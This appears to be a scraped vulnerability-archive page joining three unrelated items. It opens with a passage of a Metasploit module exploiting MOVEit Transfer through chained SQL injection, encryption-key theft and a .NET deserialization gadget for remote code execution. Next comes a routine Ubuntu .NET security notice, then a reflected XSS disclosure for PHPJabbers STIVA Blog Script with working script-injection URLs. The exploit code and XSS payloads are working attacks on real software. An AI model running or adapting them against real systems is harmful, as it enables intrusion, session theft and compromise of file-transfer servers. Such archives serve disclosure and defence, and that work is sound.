encrypt_deserialization_gadget(gadget, org_key)    org_key = org_key.gsub(' ', '')    org_key = [org_key].pack('H*').bytes.pack('C*')    deserialization_gadget = moveitv2encrypt(gadget, org_key)    deserialization_gadget  end  def find_folder_id(token_json)    folders_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('/api/v1/folders'),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API folders (#{folders_response.body})") if folders_response.nil? || folders_response.code != 200    folders_json = JSON.parse(folders_response.body)    vprint_status("Found folderId '#{folders_json['items'][0]['id']}'.")    folders_json  end  def get_csrf_token(res)    fail_with(Msf::Exploit::Failure::Unknown, 'No csrf token, or my code is bad') unless res.to_s.split(/\n/).join =~ /.*csrftoken" value="([a-f0-9]*)"/    ::Regexp.last_match(1)  end  def guestaccess_request(body)    res = send_request_cgi({      'method' => 'POST',      'keep_cookies' => true,      'uri' => normalize_uri('guestaccess.aspx'),      'connection' => 'close',      'accept' => '*/*',      'vars_post' => body    })    res  end  # Perform a request to the ISAPI endpoint with an arbitrary transaction  def isapi_request(transaction, headers)    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=m2'),      'keep_cookies' => true,      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'X-siLock-Test': 'abcdX-SILOCK-Transaction: folder_add_by_path',        'X-siLock-Transaction': transaction      }.merge(headers)    })  end  def leak_encryption_key(token_json, files_json)    haxleak_payload = [      # The \ gets escaped, so we leverage CHAR_LENGTH(39) to get the key we want (Standard Networks\siLock\Institutions\0) as all other KeyName's will be longer (Standard Networks\siLock\Institutions\1234)      "UPDATE moveittransfer.files SET UploadAgentBrand=(SELECT PairValue FROM moveittransfer.registryaudit WHERE PairName='Key' AND CHAR_LENGTH(KeyName)=#{'Standard Networks\siLock\Institutions\0'.length}) WHERE ID='#{files_json['fileId']}'"    ]    sqli(sqli_payload(haxleak_payload))    leak_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("/api/v1/files/#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #LEAK (#{leak_response.body})") if leak_response.nil? || leak_response.code != 200    leak_json = JSON.parse(leak_response.body)    org_key = leak_json['uploadAgentBrand']    vprint_status("Leaked the Org Key: #{org_key}")    org_key  end  def makev1password(password, salt = 'AAAA')    fail_with(Msf::Exploit::Failure::BadConfig, 'password cannot be empty') if password.empty?    fail_with(Msf::Exploit::Failure::BadConfig, 'salt must be 4 bytes') if salt.length != 4    # These two hardcoded values are found in MOVEit.DMZ.Core.Cryptography.Providers.SecretProvider.GetSecret    pwpre = Base64.decode64('=VT2jkEH3vAs=')    pwpost = Base64.decode64('=0maaSIA5oy0=')    md5 = Digest::MD5.new    md5.update(pwpre)    md5.update(salt)    md5.update(password)    md5.update(pwpost)    pw = [(4 + 4 + 16), 0, 0, 0].pack('CCCC')    pw << salt    pw << md5.digest    return Base64.strict_encode64(pw).gsub('+', '-')  end  def moveitv2encrypt(data, org_key, iv = nil, tag = '@%!')    fail_with(Msf::Exploit::Failure::BadConfig, 'org_key must be 16 bytyes') if org_key.length != 16    if iv.nil?      iv = Rex::Text.rand_text_alphanumeric(4)      # as we only store the first 4 bytes in the header, the IV must be a repeating 4 byte sequence.      iv *= 4    end    # MOVEit.DMZ.Core.Cryptography.Encryption    key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*')    key += org_key    key += [0, 0, 0, 0].pack('C*')    # MOVEit.Crypto.AesMOVEitCryptoTransform    cipher = OpenSSL::Cipher.new('AES-256-CBC')    cipher.encrypt    cipher.key = key    cipher.iv = iv    encrypted_data = cipher.update(data) + cipher.final    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader    header = [      225, # MOVEitV2EncryptedStringHeader      0,      data_sha1_hash[0],      data_sha1_hash[1],      org_key_sha1_hash[0],      org_key_sha1_hash[1],      org_key_sha1_hash[2],      org_key_sha1_hash[3],      iv.unpack('C*')[0],      iv.unpack('C*')[1],      iv.unpack('C*')[2],      iv.unpack('C*')[3],    ].pack('C*')    # MOVEit.DMZ.Core.Cryptography.Encryption    return tag + Base64.strict_encode64(header + encrypted_data)  end  def populate_token_instid    begin      res = send_request_cgi({        'method' => 'GET',        'keep_cookies' => true,        'connection' => 'keep-alive',        'accept' => '*/*'      })      cookies = res.get_cookies      # Get the session id from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!') unless cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/      @moveit_token = ::Regexp.last_match(1)      vprint_status("Received ASP.NET_SessionId cookie: #{@moveit_token}")      # Get the InstID from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!') unless cookies =~ /siLockLongTermInstID=([0-9]+);/      @moveit_instid = ::Regexp.last_match(1)      vprint_status("Received siLockLongTermInstID cookie: #{@moveit_instid}")    end    true  end  def request_api_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/api/v1/token'),      'Content-Type' => 'application/x-www-form-urlencoded',      'connection' => 'keep-alive',      'accept' => '*/*',      'vars_post' => {        'grant_type' => 'password',        'username' => datastore['LOGIN_NAME'],        'password' => datastore['PASSWORD']      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})") if res.code != 200    token_json = JSON.parse(res.body)    vprint_status("Got API access token='#{token_json['access_token']}'.")    token_json  end  def set_session(session_hash)    session_vars = {}    session_index = 0    session_hash.each_pair do |k, v|      session_vars["X-siLock-SessVar#{session_index}"] = "#{k}: #{v}"      session_index += 1    end    isapi_request('session_setvars', session_vars)  end  def sqli(sql_payload)    # Set up a fake package in the session. The order here is important. We set these session    # variables one per request, so first set the package information, then switch over to a    # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this    # order the session will be cleared and the injection will not work.    set_session({      'MyPkgAccessCode' => 'accesscode', # Must match the final request Arg06      'MyPkgID' => '0', # Is self provisioned? (must be 0)      'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs      'MyPkgInstID' => '1234', # this can be any int value      'MyPkgSelfProvisionedRecips' => sql_payload,      'MyUsername' => 'Guest'    })    # Get a CSRF token - this has to be *after* you set MyUsername, since the    # username is incorporated into it    #    # Transaction => request type, different types will work    # Arg06 => the package access code (must match what's set above)    # Arg12 => promptaccesscode requests a form, which contains a CSRF code    body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' }    csrf = get_csrf_token(guestaccess_request(body))    # This does the actual injection    body = {      'Arg06' => 'accesscode',      'transaction' => 'secmsgpost',      'Arg01' => 'subject',      'Arg04' => 'body',      'Arg05' => 'sendauto',      'Arg09' => 'pkgtest9',      'csrftoken' => csrf    }    guestaccess_request(body)  end  def sqli_payload(sql_payload)    # Create the initial injection, and create the session object    payload = [      # The initial injection      "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')",    ].concat(sql_payload)    # Join our payload, and terminate with a comment character    return payload.join(';') + ';#'  end  def trigger_deserialization(token_json, files_json, folders_json)    files_response = send_request_cgi({      'method' => 'PUT',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'verify' => false,      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}",        'Content-Type' => 'application/octet-stream',        'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}",        'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data)      },      'data' => @uploadfile_data    })    # 500 if payload runs :)    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #2 code=#{files_response.code} (#{files_response.body})") if files_response.code != 500  end  def upload_encrypted_gadget(encrypted_gadget, files_json)    haxupload_payload = [      "UPDATE moveittransfer.fileuploadinfo SET State='#{encrypted_gadget}' WHERE FileID='#{files_json['fileId']}'",    ]    vprint_status('Planting encrypted gadget into the DB...')    sqli(sqli_payload(haxupload_payload))  end  def exploit    # Get the sessionID and siLockLongTermInstID    print_status('[01/11] Get the sessionID and siLockLongTermInstID')    populate_token_instid    # Allow Remote Access and Create new sysAd    print_status('[02/11] Create New Sysadmin')    create_sysadmin    print_status('[03/11] Get API Token')    token_json = request_api_token    print_status('[04/11] Get Folder ID')    folders_json = find_folder_id(token_json)    print_status('[05/11] Begin File Upload')    @files_json = begin_file_upload(folders_json, token_json)    print_status('[06/11] Leak Encryption Key')    org_key = leak_encryption_key(token_json, @files_json)    print_status('[07/11] Generate Gadget')    gadget = ::Msf::Util::DotNetDeserialization.generate(      payload.encoded,      gadget_chain: :TextFormattingRunProperties,      formatter: :BinaryFormatter    )    print_status('[08/11] Encrypt Gadget')    b64_gadget = Rex::Text.encode_base64(gadget)    encrypted_gadget = encrypt_deserialization_gadget(b64_gadget, org_key)    print_status('[09/11] Upload Encrypted Gadget')    upload_encrypted_gadget(encrypted_gadget, @files_json)    print_status('[10/11] Trigger Gadget')    trigger_deserialization(token_json, @files_json, folders_json)    print_status('[11/11] Cleaning Up')    cleanup_user(@files_json)  endend

MOVEit SQL Injection

Ubuntu Security Notice 6161-2 - USN-6161-1 fixed vulnerabilities in .NET. The update introduced a regression with regards to how the runtime imported X.509 certificates. This update fixes the problem. It was discovered that .NET did not properly enforce certain restrictions when deserializing a DataSet or DataTable from XML. An attacker could possibly use this issue to elevate their privileges.

==========================================================================  
Ubuntu Security Notice USN-6161-2  
June 23, 2023

dotnet6, dotnet7 regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

USN 6161-1 introduced a regression in .NET that could incorrectly  
cause X.509 certificate imports to fail when they should succeed.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

USN-6161-1 fixed vulnerabilities in .NET. The update introduced  
a regression with regards to how the runtime imported X.509  
certificates. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

  It was discovered that .NET did not properly enforce certain  
  restrictions when deserializing a DataSet or DataTable from  
  XML. An attacker could possibly use this issue to elevate their  
  privileges. (CVE-2023-24936)

  Kevin Jones discovered that .NET did not properly handle the  
  AIA fetching process for X.509 client certificates. An attacker  
  could possibly use this issue to cause a denial of service.  
  (CVE-2023-29331)

  Kalle Niemitalo discovered that the .NET package manager,  
  NuGet, was susceptible to a potential race condition. An  
  attacker could possibly use this issue to perform remote  
  code execution. (CVE-2023-29337)

  Tom Deseyn discovered that .NET did not properly process certain  
  arguments when extracting the contents of a tar file. An attacker  
  could possibly use this issue to elevate their privileges. This  
  issue only affected the dotnet7 package. (CVE-2023-32032)

  It was discovered that .NET did not properly handle memory in  
  certain circumstances. An attacker could possibly use this issue  
  to cause a denial of service or perform remote code execution.  
  (CVE-2023-33128)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:  
Ubuntu 23.04:  
    aspnetcore-runtime-6.0         6.0.118-0ubuntu1~23.04.1  
    aspnetcore-runtime-7.0         7.0.107-0ubuntu1~23.04.1  
    dotnet-host                            6.0.118-0ubuntu1~23.04.1  
    dotnet-host-7.0                      7.0.107-0ubuntu1~23.04.1  
    dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~23.04.1  
    dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~23.04.1  
    dotnet-runtime-6.0                 6.0.118-0ubuntu1~23.04.1  
    dotnet-runtime-7.0                 7.0.107-0ubuntu1~23.04.1  
    dotnet-sdk-6.0                       6.0.118-0ubuntu1~23.04.1  
    dotnet-sdk-7.0                       7.0.107-0ubuntu1~23.04.1  
    dotnet6 6.0.118-0ubuntu1~23.04.1  
    dotnet7 7.0.107-0ubuntu1~23.04.1

Ubuntu 22.10:  
    aspnetcore-runtime-6.0         6.0.118-0ubuntu1~22.10.1  
    aspnetcore-runtime-7.0         7.0.107-0ubuntu1~22.10.1  
    dotnet-host 6.0.118-0ubuntu1~22.10.1  
    dotnet-host-7.0                      7.0.107-0ubuntu1~22.10.1  
    dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.10.1  
    dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.10.1  
    dotnet-runtime-6.0                 6.0.118-0ubuntu1~22.10.1  
    dotnet-runtime-7.0                 7.0.107-0ubuntu1~22.10.1  
    dotnet-sdk-6.0                       6.0.118-0ubuntu1~22.10.1  
    dotnet-sdk-7.0                       7.0.107-0ubuntu1~22.10.1  
    dotnet6 6.0.118-0ubuntu1~22.10.1  
    dotnet7 7.0.107-0ubuntu1~22.10.1

Ubuntu 22.04 LTS:  
    aspnetcore-runtime-6.0          6.0.118-0ubuntu1~22.04.1  
    aspnetcore-runtime-7.0          7.0.107-0ubuntu1~22.04.1  
    dotnet-host 6.0.118-0ubuntu1~22.04.1  
    dotnet-host-7.0                      7.0.107-0ubuntu1~22.04.1  
    dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.04.1  
    dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.04.1  
    dotnet-runtime-6.0                 6.0.118-0ubuntu1~22.04.1  
    dotnet-runtime-7.0                 7.0.107-0ubuntu1~22.04.1  
    dotnet-sdk-6.0                       6.0.118-0ubuntu1~22.04.1  
    dotnet-sdk-7.0                       7.0.107-0ubuntu1~22.04.1  
    dotnet6 6.0.118-0ubuntu1~22.04.1  
    dotnet7 7.0.107-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6161-2  
https://ubuntu.com/security/notices/USN-6161-1  
https://launchpad.net/bugs/2024893, https://launchpad.net/bugs/2024894

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.119-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.108-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.119-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.108-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.119-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.108-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6161-2

PHPJabbers STIVA Blog Script version 4.1 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/stiva-blog-script/                              │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers STIVA Blog Script 4.1                                           │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

GET 'category_id' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&category_id=5qn281%22%3e%3cscript%3ealert(1)%3c%2fscript%3enjmk9

GET 'lid' parameter is vulnerable to RXSS

https://website/preview.php?lid=umxpr"><script>alert(1)</script>dbyiw&pjPage=2

GET 'archive' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=b5bzk%22%3e%3cscript%3ealert(1)%3c%2fscript%3em9gtp&keyword=123

GET 'keyword' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=&keyword=123fcgbt%22%3e%3cscript%3ealert(1)%3c%2fscript%3eya0py

URL parameter is vulnerable to RXSS

https://website/preview.php/f76te"><script>alert(1)</script>cq8x2?controller=pjLoad&action=pjActionIndex&category_id=5

[-] Done

Source

Packet Storm